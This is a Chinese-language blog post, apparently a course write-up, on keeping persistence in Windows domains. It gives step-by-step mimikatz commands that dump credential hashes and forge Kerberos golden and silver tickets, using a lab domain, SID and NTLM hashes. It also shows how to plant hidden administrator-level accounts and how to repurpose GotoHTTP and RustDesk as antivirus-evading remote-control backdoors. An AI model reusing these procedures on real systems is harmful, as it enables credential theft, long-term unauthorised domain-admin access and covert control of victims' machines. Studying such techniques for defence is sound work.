【权限维持】黄金白银票据&隐藏账户&C2远控&RustDesk&GotoHTTP

已于 2024-07-03 10:08:44 修改
阅读量872 收藏
点赞数 1
分类专栏: # 权限维持 文章标签: 哈希算法 权限维持 黄金票据 白银票据
于 2023-04-10 10:18:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/130006971
版权

文章目录

内网域&单机版-权限维持-基于用户-隐藏用户

https://github.com/wgpsec/CreateHiddenAccount

工具原理:添加用户时在用户名上添加$符号,将该用户的用户组设置为空(单主机环境为空,域环境为administrator组),导致无法删除(在注册表中也可以进行隐藏)

CreateHiddenAccount_upx_v0.2.exe -u whgojp -p Whgojp!@#45

在这里插入图片描述
控制面板能查看到,命令查看看不到,单机版无法删除,域环境可以删除
在这里插入图片描述
同样的该工具也支持检测隐藏用户

CreateHiddenAccount_upx_v0.2.exe -c

在这里插入图片描述
后续权限维持RDP使用该用户进行远程连接

内网域-权限维持-基于服务TGT-黄金白银票据

⻩⾦票据⽣成攻击,是⽣成有效的TGT Kerberos票据,并且不受TGT⽣命周期的影响(TGT默认10⼩时,最多续订7天),这⾥可以为任意⽤户⽣成⻩⾦票据,然后为域管理员⽣成TGT,这样普通⽤户就可以变成域管理员。
白银票据(SILVER TICKET)是利用域的服务账户进行伪造的ST,在Kerberos认证的第三步,Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。所以只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用(不需要交互KDC,需要知道Server的NTLM Hash)。

黄金方法:

1、已经拿下域管理员,获取到krbtgt hash;
2、利用krbtgt的hash制作黄金票据工具,进行攻击。
流程:
1、域名:god.org
2、域的SID值:S-1-5-21-1218902331-2157346161-1782232778

whoami /user
whoami /all
wmic useraccount get name,sid

3、域的KRBTGT账户NTLM-HASH:b097d7ed97495408e1537f706c357fc5

mimikatz privilege::debug
mimikatz lsadump::lsa /patch		#导出所有机器用户的hash值,找到user=krbtgt的hash值

在这里插入图片描述
4、伪造用户名:webadmin(任意用户名)
生成票据:

mimikatz kerberos::golden /user:webadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:g

在这里插入图片描述
导入内存:

mimikatz kerberos::ptt g

在这里插入图片描述

访问测试:

dir \\owa2010cn-god\c$

在这里插入图片描述

后期渗透:结合前面的课程

net use \\owa2010cn-god

黄金票据总结:
该攻击⽅式其实是⼀种后⻔的形式,属于第⼆次进⾏攻击的⽅法。
第⼀次拿到域管权限之后,需要将krbtgt NTLM hash进⾏保存,当第⼆次再来进⾏域渗透攻击时,我们就可使⽤krbtgt的NTLM hash制作⻩⾦票据,从⽽再次获得域管权限。

白银方法:

1、已经拿下域管理员,获取到DC hash;
2、利用DC的hash制作白银票据工具,进行攻击。
流程:
1、域名:god.org
2、域的SID值:S-1-5-21-1218902331-2157346161-1782232778

whoami /user
whoami /all

在这里插入图片描述

wmic useraccount get name,sid

3、域DC账户NTLM-HASH:06114aa8845850d50f6cef427ebb593a

mimikatz privilege::debug
mimikatz sekurlsa::logonpasswords

4、伪造用户名:webadmin(任意用户名)
导入票据:(CIFS文件共享服务)
domain:域名
sid:域环境下的SID,除去最后-的部分剩下的内容
target:要访问的服务器,写FQDN
rc4:写的是目标主机的NTLM(主机名$对应NTLM)
service:要访问的资源类型
user:伪造的用户
cifs:共享文件

mimikatz kerberos::golden /user:webadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:owa2010cn-god /service:cifs /rc4:06114aa8845850d50f6cef427ebb593a /ptt

在这里插入图片描述

白银票据总结 只能访问文件(比较局限)
1、伪造的ST,只能访问指定的服务,如CIFS;
2、不与KDC交互,直接访问Server;
3、ST由服务账号 NTLM Hash 加密。

内网域-权限维持-基于软件-GotoHTTP&RustDesk—无需安装

解决协议问题与免杀问题(杀毒软件白名单)

C2 GotoHTTP

https://gotohttp.com/goto/download.12x
无网络(1、压根没有网络,2、限制出网)
1、有网络,无限制
2、有网络,有限制(不限制https就可以)
3、无网络,有限制(不限制https就可以)
利用场景:有网络下,需要绕过杀毒等网络防护
B2C模式,无需安装控制端软件,有浏览器就可以远控。
流量走https协议,只要目标放行443端口出口就可以实现内网穿透。
在低带宽也可以使用,运行占用内存极低,控制时占用CPU仅为0%-3%。
被控端在类Linux系统上支持图形界面(GUI)和字符界面(CLI)。
网络唤醒远程主机需加载驱动,导致运行时安全卫士会拦截这行为,其他杀软不会拦截。

在这里插入图片描述
程序运行之后生成两个文件其中包含电脑ID与控制码,即可以进行远程连接
在这里插入图片描述

C2 RustDesk 推荐

https://github.com/rustdesk/rustdesk
利用场景:无需网络,需要绕过杀毒等网络防护
1、有网连接:
C:\Users\用户名\AppData\Roaming\RustDesk\config
其中ID和密码在RustDesk.toml文件里。
在这里插入图片描述
外网连接
在这里插入图片描述
2、无网内网连接:IP直连(允许ip直连选项)
RustDesk2.toml

direct-server = 'Y'
direct-access-port = '8443'

在这里插入图片描述
这里演示的是从webserver使用ip(192.168.3.21:8443)直连
在这里插入图片描述

An0nymouer
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
制(command&control,C2)---多次跳转代理,多阶段通道,多频带通信,多层加密,端口试探,程连接工具
AG9GgG的博客
05-07 1386
多次跳转代理 为了掩盖恶意流量的来源,攻击者可能会将多个代理链接在一起。 通常,检测方能够识别进入网络前的最后一个代理,检测方不一定能够识别到最后一跳代理之前的其他代理。这项技术使得检测方需要通过追踪许多代理来进行恶意流量的溯源,导致恶意流量溯源变得更加困难。 多阶段通道 攻击者可以为不同通信条件或特定的功能创建多阶段通道,多阶段通道将混淆预案通道,使得通道的检测更加困难。 程访问工具...
c语言,C&C工具:WebSocket C2
weixin_39714849的博客
05-20 592
这篇文章,我们将学习另一款 C&C 工具 WebSocket C2,也被称为 WSC2。介绍WSC2 主要是一款后渗透测试工具。WSC2 会使用 WebSocket 和一个浏览器进程。它的作用是在目标靶机上运行的客户端和实际充当 C2 服务器的制器之间作为 C2 通信通道。这款工具使用 Python 开发的。本文演示环境·攻击机:kali Linux·靶机:Windows 10安装首...
权限维持-白银票据
m0_64815693的博客
06-04 281
权限维持-白银票据
【域权限维持】-白银票据
qq_41617902的博客
11-08 369
权限维持-白银票据的攻击过程与简单检测方式
制(command&control,C2)---Fast flux
AG9GgG的博客
05-23 1540
Single Flux 顾名思义,single flux是只有一层变化的fast flux,一个域名拥有一个不断变化的IP地址列表,列表可能包含成百上千条IP地址。为了实现频繁的IP地址变化,制者制最底层域名服务器,这个服务器返回频繁变化的C2服务器IP地址,如果使用别人提供的域名服务器,频繁的更改IP表容易被管理者检测出来,导致僵尸网络暴露。 Double Flux 较single flu...
白银黄金价格图表「Silver & Gold Price Charts」-crx插件
03-20
保持最新 - 目前的银,金,钯和铂现货价格走势图。 美元,欧元和实时报价中的白银黄金,铂金和钯金价格图表。 支持语言:English
黄金白银价格「Gold & Silver price」-crx插件
03-19
实时的黄金白银价格 实时黄金白银价格 支持语言:English
查询白银价格 黄金白银价钱走势查询 v1.0
10-21
较新黄金价格走势,较新白银价格走势,黄金走势,纸黄金实时价格。
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
攻击者可以创建Golden Ticket(黄金票据)和Silver Ticket(白银票据)来模拟合法的Kerberos票证,以此提升权限。Golden Ticket是伪造的TGT,允许攻击者长时间保持权限;而Silver Ticket则是针对特定服务的伪造TGS...
深石油黄金白银分析 银天下深石油行情分析软件 v4.3.0
10-23
银天下深石油行情分析软件专注于石油交易,实时更新经济数据,权威专业易操作。投资者可获取整合的资讯信息,专家解盘,实时交易行情。银天下石油深石油行情分析系统是一
黄金票据白银票据
weixin_58954236的博客
10-11 250
PTH:哈希传递PTT:票据传递(黄金票据白银票据
C2之初探shellcode
最新发布
qq_29948489的博客
02-20 1185
杀软一般通过一下几点来检测恶意软件和行为:1、静态查杀:最基本的查杀方式,主要通过对文件的特征码进行扫描,匹配已知的病毒特征库。如果发现文件特征码与病毒特征库中的某个病毒特征码相匹配,就判断该文件为病毒;部分杀软会在静态查杀时将程序放入沙箱中运行几秒的方式以检测程序是否是恶意程序。2、动态(主动)查杀:通过在程序运行时扫描程序内存是否匹配病毒特征的方式主动发现恶意程序。在EDR中还会挂钩敏感的Windows API,在程序调用到被挂钩的API时检查函数参数和调用栈以检测恶意程序。
黄金票据白银票据详解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-22 5326
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
域渗透-白银票据黄金票据的利用
orange777
02-23 3803
最近做了一些靶场域渗透的实验,记录下一些关于白银票据黄金票据的问题。 0x01 白银票据的利用 1 环境信息 域DC 192.168.183.130 域内主机win7 192.168.183.129 2 使用场景 在拿到一个普通的域成员权限的时候,可以尝试使用ms14-068伪造一个票据,从而让我们的域用户有域管理员权限。 3 利用过程 说明:这里是用vulnstack4靶机笔记的实验环境,来演示一下利用过程 获取sid whoami /all 伪造票据 MS14-068.exe -u 用户名@域
「Active Directory Sec」白银票据黄金票据
dr0op's blog
07-12 869
白银票据: 即伪造的TGS。当获取需要访问的目标服务器NTLM HASH后,就可以利用Mimikatz伪造TGS,直接去访问目标服务器。此过程不需要KDC的参与。但缺点是只能访问一个服务。黄金票据: 即伪造TGT。当攻击者拥有普通域账户,krbtgt ntlm hash ,域SID时,就可以伪造TGT。拥有黄金票据就拥有了域内所有的访问权限。 通过Kerberos的通信过程就可以看出,当攻击者获取krbtgt的HASH值时,就可以利用这个HASH去伪造TGT,票据授予票据,在以后每一次的通信过程中,Cl
白银票据的原理和使用
qq_45455136的博客
12-21 1092
白银票据的原理和使用 白银票据(Silver Ticket)原理 白银票据的使用 服务账号是计算机名字+$用来管理服务的账号 白银票据(Silver Ticket)原理 白银票据是伪造本该由TGS返回的ST(服务票据),从而访问对应的服务 有server用户的hash就可以伪造出ST,且不经过KDC,但伪造的票只对部分服务起作用,权限黄金票据
【内网安全】黄金票据白银票据
过期的秋刀鱼
10-12 1034
黄金票据就是伪造了Kerberos协议中的身份票据(TGT)黄金票据可以访问该用户身份的所有服务白银票据就是伪造了Kerberos协议通信流程中服务票据(SGT)白银票据只能访问某一个服务使用域管理员身份创建的票据就是黄金票据,可以访问域内的所有服务。黄金票据就是伪造了Kerberos协议中的身份票据(TGT)黄金票据可以访问该用户身份的所有服务白银票据就是伪造了Kerberos协议通信流程中服务票据(SGT)白银票据只能访问某一个服务使用域管理员身份创建的票据就是黄金票据,可以访问域内的所有服务。
权限维持(黄金票据白银票据)
qq_18811919的博客
03-19 1939
黄金票据白银票据通常被认为属于票据传递攻击(Pass-the-Ticket,简称PTT)的一种。 这是一种针对Windows身份验证系统的攻击,攻击者可以利用缺陷或弱点获取用户或系统 帐户的票据信息,然后将其用于进一步攻击或访问敏感资源本篇文章注意讲述了黄金票据白银票据的数据包分析以及如何进行PTT攻击,讲述了多种利用方式包括CS/mimikatz/Impacket等。
内网中黄金票据白银票据的区别
05-14
在内网中,黄金票据白银票据通常是指两种不同的身份验证方式。 黄金票据是指一个用于身份验证的加密令牌,它被称为黄金是因为它具有最高的权限级别。黄金票据可以让用户在网络中获得管理员级别的访问权限,因此它的使用应该被高度限制并受到严格的监管。 白银票据则是一个用于身份验证的较低级别的加密令牌。它通常被用于授权用户在网络中执行一些普通的任务,例如打印文件或者访问共享文件夹。白银票据通常具有比黄金票据更低的访问权限,因此它的使用范围更广,可以被更多的用户所使用。 总的来说,黄金票据白银票据都是用于身份验证的加密令牌,它们的主要区别在于权限级别的高低。在内网中,这些票据的使用应该受到高度的限制和监管,以确保网络的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值